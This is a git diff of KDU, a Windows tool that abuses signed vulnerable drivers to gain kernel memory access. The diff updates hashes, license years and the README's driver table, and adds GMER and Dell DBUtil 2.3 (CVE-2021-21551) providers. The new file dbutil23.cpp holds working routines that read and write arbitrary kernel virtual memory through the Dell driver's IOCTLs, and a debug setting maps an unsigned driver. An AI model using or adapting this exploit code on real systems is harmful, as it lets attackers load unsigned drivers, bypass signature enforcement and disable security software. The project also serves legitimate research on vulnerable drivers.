diff --git a/Bin/drv64.dll b/Bin/drv64.dll
index 1d9e739..a2529c6 100644
Binary files a/Bin/drv64.dll and b/Bin/drv64.dll differ
diff --git a/Bin/kdu.exe b/Bin/kdu.exe
index dae2e1f..73e7c9c 100644
Binary files a/Bin/kdu.exe and b/Bin/kdu.exe differ
diff --git a/Bin/license.txt b/Bin/license.txt
index a9d4dae..051953a 100644
--- a/Bin/license.txt
+++ b/Bin/license.txt
@@ -1,6 +1,6 @@
MIT License
-Copyright (c) 2020 - 2021 KDU Project
+Copyright (c) 2020 - 2022 KDU Project
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
diff --git a/KDU.sha256 b/KDU.sha256
index 3f19561..d7a445b 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -1,8 +1,8 @@
-d3a2d4ba16add4a2c961fc907355ac994dceedd4fb56aa1bc2d76b9bdef77bd8 *Bin\drv64.dll
+a2030e34f60ef453ed19af18d306258717834f8988e0e3b3e8ec3917476915f6 *Bin\drv64.dll
293cb9a86a3f89e377ef5c6716d70bbdfd9c57ff0a07d484bd8abc1f521e70cc *Bin\dummy.sys
82370b38b940f98013a6506a82c35913ec810f312d93b93b5406f3caf07bda9f *Bin\dummy2.sys
-5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f *Bin\kdu.exe
-d1de3738065ee9682af1efa91a14addcf50bfc5828cf78efd7b5182a714fcdfd *Bin\license.txt
+5705dce58c67949a2c1bda83f5e3024ca1c99bd2c08b317fbf39732987174231 *Bin\kdu.exe
+751d35646474f1854972d6cc45c5b7419933e36fabe013eba785f276ec566d25 *Bin\license.txt
323d910f93683453d45239a0528d3c3cda7f2608fca864fd2a687184ffe129fe *Help\kdu1.png
a1d7a51549914833a3414a93646952c25deabe072d8a271b54e10727f923b479 *Help\kdu2.png
d2c38793dc0a55da29fd8336f397b9a9374690747d0d210d453f32c42cad9d84 *Help\kdu3.png
@@ -29,30 +29,30 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\Example
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\Examples\DummyDrv2\dummy\r3request.c
cdfccae79b68bc7e66063d9a625caf32ef834e9e050b658b2bfa180b806290f8 *Source\Hamakaze\compress.cpp
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
-acb25477b7f510a22cdbb8f8fa3761bded6aaf47270b6714b336eab5f50044ee *Source\Hamakaze\consts.h
+86afb10ba8a7084ff696c82bc24e3c55dc206d254812d7c54d96bcfac6447392 *Source\Hamakaze\consts.h
405d06a619c3f8194af6ed4953f4facbcd1b9cf839ab085a64825131b44e9533 *Source\Hamakaze\drvmap.cpp
bf441b39bc025f2222b1e40fd1afde4fe997b251bce19423cc02b462c5ca929e *Source\Hamakaze\drvmap.h
bbe92082740904e98938dbf615ca5c90fecc436eba56b4de01a50e4879bd1b3e *Source\Hamakaze\dsefix.cpp
c8b1ae58b617d925bf2a19fd5c0a21071f653458d175482c2f2e74b55ecb6066 *Source\Hamakaze\dsefix.h
-e807980816397dfdb4cc89c9d549b5f363f0f8fa504f50cc5cc16053b7821c8b *Source\Hamakaze\global.h
-94fe6984818d83d42f2de2992cfdc6fa27ed8abc6f53ce782c17d0a7d10c6c49 *Source\Hamakaze\KDU.vcxproj
-4cab2041b7531b4897da7742d1d7bec19ed30d2d7e829458e82a3c8abf32b269 *Source\Hamakaze\KDU.vcxproj.filters
-526fb739aeafd4584983066a00e8d94f267651ceb1bd046065b8d7465b9bf265 *Source\Hamakaze\KDU.vcxproj.user
-a8e8429c248c3fb2d2a84877990f129ee1d4a77af267a63c55c579efadd6cc03 *Source\Hamakaze\kduplist.h
-c3b6c78d3d4a4542fbfe574a6c22ad7a6b9576670be8595261f3fead29d719de *Source\Hamakaze\kduprov.cpp
-1bdeb9d16c67d2a8bc1b19f45687e8cc229387f5e37dbaa0fe4357a9a5646d62 *Source\Hamakaze\kduprov.h
-6ae9bc41831b501a5f4ea2c7261696065efb5c11d360ff12257fb3be149d2abf *Source\Hamakaze\main.cpp
-7b7bc2ef8d075d44f2761f081516f3cd7bd76cb63fe555c9aee2b2c510742961 *Source\Hamakaze\pagewalk.cpp
+bea7c37207b9160e562bbe04e4a0b804467634ce6d114fee52a87c6b352c73e9 *Source\Hamakaze\global.h
+de7f5d11ae1790b00907a4bc6384c8cbdedb20292f10628307f421f153c3909c *Source\Hamakaze\KDU.vcxproj
+27e4c97365a3e159daf3e647ef0638ad1bde3f1a8a1c0de1a6fc347b3b99d5c8 *Source\Hamakaze\KDU.vcxproj.filters
+b7b1235cb84a7754401acde239646dd2b4e86452e7758e6ea8527b9978bd6ae7 *Source\Hamakaze\KDU.vcxproj.user
+0ac4d7bbc700ba7bc9dd4cd52c8b74742960f9ad3244d1d91b306b856984ae76 *Source\Hamakaze\kduplist.h
+06bb890b75d1a70c8a60b6449370020b62e7206ede03de53931a443c7feabad8 *Source\Hamakaze\kduprov.cpp
+9e450c9ff2916acb17ce411e422a2579c9b422d6c5b270fa1cc0fbfefecebc58 *Source\Hamakaze\kduprov.h
+87e503a96c3e3cd978658b604ef3944854670d2d1bc870a481db66a0a2daec38 *Source\Hamakaze\main.cpp
+e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
-6fab38e28fb9fe4e993a8ce5a932907155927e37cee865332099ffa848f2b394 *Source\Hamakaze\ps.cpp
-b8998a06b4f7a7bc724f22ee0adfad7636e66d75f46ebc065ab7898888fe6017 *Source\Hamakaze\ps.h
+b213bcd339db20dddd8b0acfe53c964b805b3ca53f7214a09e5e04befb9e4b46 *Source\Hamakaze\ps.cpp
+6c9e5a15f9d01db4b50ac06b723d4fe9468e2bb02eb8ba77c4bfecf8d83f1f8e *Source\Hamakaze\ps.h
8602466131240873672fd38bc977ca9d4e69e37ccb3f5b716fc695cce1e0b195 *Source\Hamakaze\resource.h
-60a6c8023d0daec521507f1668d72d4eadea4c355a87b12d11db62a0ec4d7d50 *Source\Hamakaze\resource.rc
+aa719973a0ed011032ff2cbc84bf63f99a8639593e40d8897e55b7d612c870e0 *Source\Hamakaze\resource.rc
fbeefc07c581f2c75233f36878d1e345e9d4916853eb6bcadccdfa9c5fe894bf *Source\Hamakaze\shellcode.cpp
47f83ecc1674a80151a89994af0242e41a1638eea3fe61b9aceaa0ac437f2b13 *Source\Hamakaze\shellcode.h
41a98d55095b3873b8d3057e223f440a34f992850436efd21024dc491d33a1d5 *Source\Hamakaze\sup.cpp
0d9c39f3b13871c096318adee651f89cd11ba9cab0d81644e3fb8f5ada3a8a85 *Source\Hamakaze\sup.h
-a20e6c85a7a8db1556ce245d1d6da12e34ea7b12d0268d5f114c2d63b6910d2b *Source\Hamakaze\tests.cpp
+9cfa6e8825aeacba88805cf36d95c1f42a5074638c87cf3ecbdf670ad0ded452 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
e0564204976bd689d0dfb07be5f511c9f778848afb67cd62b56a01492f03bf7f *Source\Hamakaze\victim.cpp
57f9d6b92de51d66e43f12e9caceb2229a0aa4e84a43081d50cb632256c771a0 *Source\Hamakaze\victim.h
@@ -63,8 +63,12 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
b060200c94e87f7264dbc670f79d8c692211cca292b4889a893c21c951ededc1 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
+ddfd650552905c29e5e5e4730e4a9e797543975cc6d91d9f632cda2cec74371b *Source\Hamakaze\idrv\dbutil23.cpp
+a0a0379f23b15c83e9e331dcbee75a0fd10af07fe5cfda34df8cd3a356360dba *Source\Hamakaze\idrv\dbutil23.h
1fb270ea167913df0fbc8785fadf108bc102fdf527570d81ca003f3f6ff1a6d1 *Source\Hamakaze\idrv\directio64.cpp
73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h
+fd8a96c13cb33dfaf06f6029d15c062430c9bfd9cf49241651e5fcf62e505034 *Source\Hamakaze\idrv\gmer.cpp
+d14a2c9433dd4e5b765c7fef2910e12b251783a3805227ab1f6e1cd0e563e956 *Source\Hamakaze\idrv\gmer.h
8bcc062ab27f293c35df032340e761f18013d978fd3df33fbaca3a30a2726b5f *Source\Hamakaze\idrv\lha.cpp
dcb5da7acb4997abbde8372a8daf74dae5727ca5cbf80b26876fdb4cb2a0bc08 *Source\Hamakaze\idrv\lha.h
af3281bf9ab1b6693296baa6b0cee502c2b8d8660bdd3289fbfba16dc9cc3803 *Source\Hamakaze\idrv\mapmem.cpp
@@ -79,10 +83,10 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
1eca84cbe37c198879c6d435359ab4bd799e23e3fc28c7ed2f18a8da4234e7a6 *Source\Hamakaze\idrv\winio.cpp
9eda15651e81be3fe7a8936a064f95719af7626bf87f81470b5f6c93d0c66d40 *Source\Hamakaze\idrv\winio.h
-3eb55e40b835c54dcc949ed649c3590929997d15d1711b338be2db3fc180a97d *Source\Hamakaze\idrv\winring0.cpp
-b9dbf5257f95e5b31f0838f6b192a2dc2b7a6021f73c6249671bdf47b2998ec8 *Source\Hamakaze\idrv\winring0.h
+3fd20249ff874011dbd7af8d30b9407b2dfcb2791e3e6cd0f9c5e5ddbb2baed1 *Source\Hamakaze\idrv\winring0.cpp
+103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
-f3468922e465b82842225594c23b56508c55f154d397c11be054092824562ead *Source\Hamakaze\res\SB_SMBUS_SDK.bin
+b0030a31ae5c634b878e4a6519d8465292f09499e483a566a8d889cd6d0e3ce0 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\minirtl\cmdline.h
@@ -100,8 +104,9 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Shared\minirtl\_strend.c
60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Shared\minirtl\_strlen.c
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\minirtl\_strncpy.c
-9323cc92fc8a04a0fbe740061e4fdb3d808004b11bc71e2f0d39e060e843e9c8 *Source\Shared\ntos\halamd64.h
-2fa69b0677a3c7c93f7b85eca0f78c6548210e3fd7826fd8ae010db33456e52d *Source\Shared\ntos\ntos.h
+8acab5c8b8b339bdaf8e7b7d06f2cd6b10d24f889ef92462e4e53abbc5dc5341 *Source\Shared\ntos\halamd64.h
+5951b85f4d82c7ca4c0adffd312133e8dc82b468bc97e172c58d6c1c5f7008cb *Source\Shared\ntos\ntbuilds.h
+bcd4a44996044fda3b3eaa335f01040f4a12cf894da82f17ce14fa5242cfd396 *Source\Shared\ntos\ntos.h
261011d0ee9c2d2ee22dad2cdb45d66449b22b5a831fd60293f315c72968dd32 *Source\Shared\tinyaes\aes.c
a68264a684f0c19caf7f2464544d9e8163362cd919f382d08b82cbef0497a6f7 *Source\Shared\tinyaes\aes.h
6bce46a89815c8270e833b72fb28c1c8543036f214b13946a5f5449a3cd4e988 *Source\Taigei\export.def
@@ -109,35 +114,37 @@ f66c8a7d577c5daad5ccb9d7b1269b2ef274914cf0ed9bb9c8ca3f1755ed26df *Source\Taigei\
8b14163e1cf7ca090fe44dcf2342eb8a9eac03821b5ff20fd51a16966061d4a7 *Source\Taigei\Taigei.vcxproj
c06a15e597a68a248263c0e417b21b4b5f32fbd6685871d10e8cc5a22db2cfc3 *Source\Taigei\Taigei.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
-87fd18410407f1b65d97d3ba67e925a32af7b742dbde81b04e68d4e5f0e179ad *Source\Tanikaze\resource.h
-4be820fcd21fb7e4b861964446ff8d398c9b2d3c63bba0db4ee409037227b0b7 *Source\Tanikaze\resource.rc
-92988ef31feef80907ee4156a183163cb01f16dfd0c13265d3b5c767a4dec69d *Source\Tanikaze\Tanikaze.vcxproj
-6bebec6f6fd779896eaa133371378960f690ff769487972b9c9dadac4c0522e1 *Source\Tanikaze\Tanikaze.vcxproj.filters
+276d982c42eeb1e7cf297cf14c8d505b304611b7f125f291177c3def83aa9826 *Source\Tanikaze\resource.h
+546ccc6cc3e4c4fa0ddedd156812b96138123f2c3778d41ed28c49d9decdea63 *Source\Tanikaze\resource.rc
+424c52b37168318da1386f46768fcb723335c9e59f3fc9b45defbbb5ff20ee00 *Source\Tanikaze\Tanikaze.vcxproj
+e96e987e413cbc3ed3babc49fd6872b5a7241abc8dd4df585cf33f59a97a748d *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
-62adafee593db6c3883de1bdad56a044599fe26a94fc35f137f85f8efc212711 *Source\Tanikaze\drv\asio2.bin
-d275162743495faa56903f933e983cb85e3340ac5ad6d3972f715f4119c9d147 *Source\Tanikaze\drv\ATSZIO64.bin
-b628120f95be954cf411db37aa405d9462bac20ab785a3bcf3daa622f9af0a88 *Source\Tanikaze\drv\DirectIo64.bin
-80fbc6fab642677c7f51f0d0892ee605101c5ab6cb70d2bae9b3cb0fee97e37b *Source\Tanikaze\drv\ene2.bin
-80ceb30c1de633154e830faa93057d4ba853a0cee055c732ef1fd070b3f10d1f *Source\Tanikaze\drv\EneIo64.bin
-91d1e8477d57e9449a96eda2fe0009c5bb3263323f2813064e9e241c3d684b92 *Source\Tanikaze\drv\EneTechIo64.bin
-4c6ea5d7a5b4dedc1559ec501fb248fa601ea212232dd26549c9d20aac0e574e *Source\Tanikaze\drv\gdrv.bin
-e3204fb564ee4e68f336792f6f1b7d2d7c1659ef7c25776057ca1310dba5f368 *Source\Tanikaze\drv\GLCKIO2.bin
-095f54f59989fdd93656017375123c1de26b31213ae035941027575147ddae70 *Source\Tanikaze\drv\iQVM64.bin
-23753605bac01d2b319555ceaf9d487032faaa897c2ffb24f03d20d4f886bd13 *Source\Tanikaze\drv\lha.bin
-2fe561381d0ea3a888f8565e4236feb93faa9582aa67260af89f332e016cdead *Source\Tanikaze\drv\MsIo64.bin
-7d682140ffb8f7ec0c8942a67529f359b064e43a2b10ff81912f630f1859f4e2 *Source\Tanikaze\drv\Phymemx64.bin
-351a0e7f630816441ee047d709adb327ca1c741630aeddaebc826aa717f87010 *Source\Tanikaze\drv\procexp.bin
-d4dc28268fe9b0398dc020da3948e902a88cf8ed6f2fd5efdec198f442ce0ae1 *Source\Tanikaze\drv\RTCore64.bin
-386310c08c444ef06cc94f79b45c2ae863845b2462d97b10d348354b256826c4 *Source\Tanikaze\drv\rtkio64.bin
-5217882ca699bfabacab7621926871760daff68b9bcb4f30ebe7956196170e4f *Source\Tanikaze\drv\WinRing0x64.bin
+502deb8b46d9a3504bd6b28fdd430c3374eeb20087352ab20efac04e39fcf1f7 *Source\Tanikaze\drv\asio2.bin
+8f19c5e57e5c1b07fa9dfdd87a21ca7fce2316ca6430ddc38d189364ad36d45b *Source\Tanikaze\drv\ATSZIO64.bin
+5072a4397ebb018a364c32b520a6a511dec14af5ed10715d5dfb0fb6bc053a13 *Source\Tanikaze\drv\DbUtil2_3.bin
+81289d1be53fc82c59224047e19e39ea6a46c135230a92bc28f80cf616b578c0 *Source\Tanikaze\drv\DirectIo64.bin
+73db7d386cde3f27f71d8cc3b8ded43a32f4ee7a1df4e348c4bdab509ed66a81 *Source\Tanikaze\drv\ene2.bin
+88feedd2654bc89700fb2a8e2198799b43f9d9c18b63af34045ff71896e7a342 *Source\Tanikaze\drv\EneIo64.bin
+350e2fbee96f8574fdbde8f07c3713f91ec6fef1589feb94ca19c4d50b62cfdc *Source\Tanikaze\drv\EneTechIo64.bin
+0685b2359a3177797e87e5a6183d8c0f9a681bfb1a293636eab4b41c7862690a *Source\Tanikaze\drv\gdrv.bin
+b5a9114336db72677e1756c3b4e7a7ae81929bd31fa288706d148da261c0ef02 *Source\Tanikaze\drv\GLCKIO2.bin
+9939cbd32c333a2ff8aea72558663db8bdc83d276b24253e1e5cca8108be418c *Source\Tanikaze\drv\gmerdrv.bin
+6e03c350685045764b5701e09be8ed8c79bbbc6c8c5902f6c881461eddae7e1d *Source\Tanikaze\drv\iQVM64.bin
+099dc2a6b2122861188fbfe68d74028f0e10bdcf2da26d3df3b7c150df4276fd *Source\Tanikaze\drv\lha.bin
+8cb8a1ccf064fd7db79acd2d1009ba1bcb4f583fa43c572e9ff9e18dc8317b9d *Source\Tanikaze\drv\MsIo64.bin
+ef8daf6ccdfd87a2684943e9545b7f7aafad8c16ebdb008fc3fbbf6092faef19 *Source\Tanikaze\drv\Phymemx64.bin
+5cdbc99a70d09103394546d4f86e3defbe0296719c2b9828bc38eeec4d038303 *Source\Tanikaze\drv\procexp.bin
+625c1b032bcffa1596db11a82d39a797bb26e80c38f2a6a380a9f8442658f431 *Source\Tanikaze\drv\RTCore64.bin
+e9e824dbb097e29b599ca1d0da197fa5df9a117f7753a04c988c7c9d11c2a00a *Source\Tanikaze\drv\rtkio64.bin
+03f82bc73c588f136e33fecb8ff4c42d151e0973717087411cea99a5d44fc1a2 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
0f66125c8a4beed047c8bfb2eb57f8aa8ce3acc390b9303b4b2d10815e8d4b9c *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj.filters
1cfea117cf16c3510a679a865b5751eebc135805afd9b39b544e20042e74dc41 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj.user
87cc605c53a167d0e1bce915cdf463786e0eb5de37c33d1883514f06df273426 *Source\Utils\GenAsIo2Unlock\main.cpp
-238259eb3f3e8d38d3e63d3648d858ffb371cd139b63726c5ecc6fb88309e8de *Source\Utils\PCOMP\PCOMP.cpp
+3629eef29efb058cdecf1f95544f4e2b317d4ff24e6940df2ad7eccd5512cd2c *Source\Utils\PCOMP\PCOMP.cpp
fbc6b76b8c809fe418f5b5db7a9e2627a960b934bcf788d0e47b36276e12e874 *Source\Utils\PCOMP\PCOMP.sln
-39a7ea3734cf5792b2791cdc5a11a5bb4cd0a277b076b4d1c92809579f8a563c *Source\Utils\PCOMP\PCOMP.vcxproj
+9d3ab8fd28598d38ff4cec709f99ba2206cecd1fb5ea78495ae115e1efad855d *Source\Utils\PCOMP\PCOMP.vcxproj
9e9296faaa6345655fcdc45387d249ff7f9918e4d384bc65a315b0b16e725c79 *Source\Utils\PCOMP\PCOMP.vcxproj.filters
5ba7c301714e8de140444210d020c93affb2dbd2acc5537697ff54febdeffbf7 *Source\Utils\PCOMP\PCOMP.vcxproj.user
diff --git a/LICENSE.txt b/LICENSE.txt
index a9d4dae..051953a 100644
--- a/LICENSE.txt
+++ b/LICENSE.txt
@@ -1,6 +1,6 @@
MIT License
-Copyright (c) 2020 - 2021 KDU Project
+Copyright (c) 2020 - 2022 KDU Project
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
diff --git a/README.md b/README.md
index d9ef739..0769559 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
#### System Requirements
-+ x64 Windows 7/8/8.1/10;
++ x64 Windows 7/8/8.1/10/11;
+ Administrative privilege is required.
# Purpose and Features
@@ -112,6 +112,8 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 12 | LG | LHA | LG Device Manager | Semi-original | 1.6.0.2 |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | WINIO | 2.1.7.1 and below |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | Original | 10.1 and below |
+| 15 | GMER | GmerDrv | Gmer "Antirootkit" | Original | 2.2 and below |
+| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | Original | 2.3 and below |
More providers maybe added in the future.
@@ -154,6 +156,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* CVE-2019-18845, https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845
* DEFCON27: Get off the kernel if you cant drive, https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf
* CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver, http://www.jackson-t.ca/lg-driver-lpe.html
+* CVE-2021-21551, https://attackerkb.com/topics/zAHZGAFaQX/cve-2021-21551
# Wormhole drivers code
@@ -166,4 +169,4 @@ They are used in multiple products from hardware vendors mostly in unmodified st
# Authors
-(c) 2020 - 2021 KDU Project
+(c) 2020 - 2022 KDU Project
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index 4bbb462..f7800c1 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -126,7 +126,9 @@
+
+
@@ -149,6 +151,7 @@
+
@@ -158,7 +161,9 @@
+
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index a3c9295..2cab27d 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -132,6 +132,12 @@
Source Files\idrv
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
@@ -230,6 +236,15 @@
Source Files\idrv
+
+ ntos
+
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index dcd114c..2a1f754 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,12 +1,11 @@
-
-
+ -test
WindowsLocalDebugger
- -dse 6
+ -prv 16 -map c:\makeexe\kdu\bin\dummy.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/consts.h b/Source/Hamakaze/consts.h
index 152ee90..1760884 100644
--- a/Source/Hamakaze/consts.h
+++ b/Source/Hamakaze/consts.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: CONSTS.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 14 May 2021
+* DATE: 25 Jan 2022
*
* Global consts.
*
@@ -37,7 +37,7 @@
#define SHELL_POOL_TAG ' oI'
-#define PROVIDER_RES_KEY ' uwu' // Giving you enough uwu's.
+#define PROVIDER_RES_KEY ' owo' // Giving you enough uwu's.
//
// Driver id table
@@ -58,58 +58,5 @@
#define IDR_LHA 116
#define IDR_ASUSIO2 117
#define IDR_DIRECTIO64 118
-
-//
-// Defines for Major Windows NT release builds
-//
-
-// Windows 7 RTM
-#define NT_WIN7_RTM 7600
-
-// Windows 7 SP1
-#define NT_WIN7_SP1 7601
-
-// Windows 8 RTM
-#define NT_WIN8_RTM 9200
-
-// Windows 8.1
-#define NT_WIN8_BLUE 9600
-
-// Windows 10 TH1
-#define NT_WIN10_THRESHOLD1 10240
-
-// Windows 10 TH2
-#define NT_WIN10_THRESHOLD2 10586
-
-// Windows 10 RS1
-#define NT_WIN10_REDSTONE1 14393
-
-// Windows 10 RS2
-#define NT_WIN10_REDSTONE2 15063
-
-// Windows 10 RS3
-#define NT_WIN10_REDSTONE3 16299
-
-// Windows 10 RS4
-#define NT_WIN10_REDSTONE4 17134
-
-// Windows 10 RS5
-#define NT_WIN10_REDSTONE5 17763
-
-// Windows 10 19H1
-#define NT_WIN10_19H1 18362
-
-// Windows 10 19H2
-#define NT_WIN10_19H2 18363
-
-// Windows 10 20H1
-#define NT_WIN10_20H1 19041
-
-// Windows 10 20H2
-#define NT_WIN10_20H2 19042
-
-// Windows 10 21H1
-#define NT_WIN10_21H1 19043
-
-// Windows 10 Active Develepment Branch (21XX)
-#define NTX_WIN10_ADB 21376
+#define IDR_GMERDRV 119
+#define IDR_DBUTIL23 120
diff --git a/Source/Hamakaze/global.h b/Source/Hamakaze/global.h
index f91ae50..ebe98be 100644
--- a/Source/Hamakaze/global.h
+++ b/Source/Hamakaze/global.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: GLOBAL.H
*
-* VERSION: 1.10
+* VERSION: 1.12
*
-* DATE: 02 Apr 2021
+* DATE: 25 Jan 2022
*
* Common include header file.
*
@@ -44,6 +44,7 @@
#include
#include "../Shared/ntos/ntos.h"
#include "../Shared/ntos/halamd64.h"
+#include "../Shared/ntos/ntbuilds.h"
#include "wdksup.h"
#include "resource.h"
diff --git a/Source/Hamakaze/idrv/dbutil23.cpp b/Source/Hamakaze/idrv/dbutil23.cpp
new file mode 100644
index 0000000..de5a9b8
--- /dev/null
+++ b/Source/Hamakaze/idrv/dbutil23.cpp
@@ -0,0 +1,140 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: DBUTIL23.CPP
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* Dell BIOS Utility 2.3 driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/dbutil23.h"
+
+/*
+* DbUtilReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via Dell DbUtil driver.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+
+ SIZE_T size;
+ ULONG value;
+ DWORD dwError = ERROR_SUCCESS;
+ DBUTIL_READWRITE_REQUEST* pRequest;
+
+ value = FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
+ size = ALIGN_UP_BY(value, PAGE_SIZE);
+
+ pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ if (pRequest) {
+
+ if (VirtualLock(pRequest, size)) {
+
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL23_READVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
+
+ if (!bResult) {
+ dwError = GetLastError();
+ }
+ else {
+ RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes);
+ }
+
+ VirtualUnlock(pRequest, size);
+ }
+
+ VirtualFree(pRequest, 0, MEM_RELEASE);
+ }
+
+ SetLastError(dwError);
+ return bResult;
+
+}
+
+/*
+* DbUtilWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via Dell DbUtil driver.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+
+ SIZE_T size;
+ ULONG value;
+ DWORD dwError = ERROR_SUCCESS;
+
+ DBUTIL_READWRITE_REQUEST* pRequest;
+
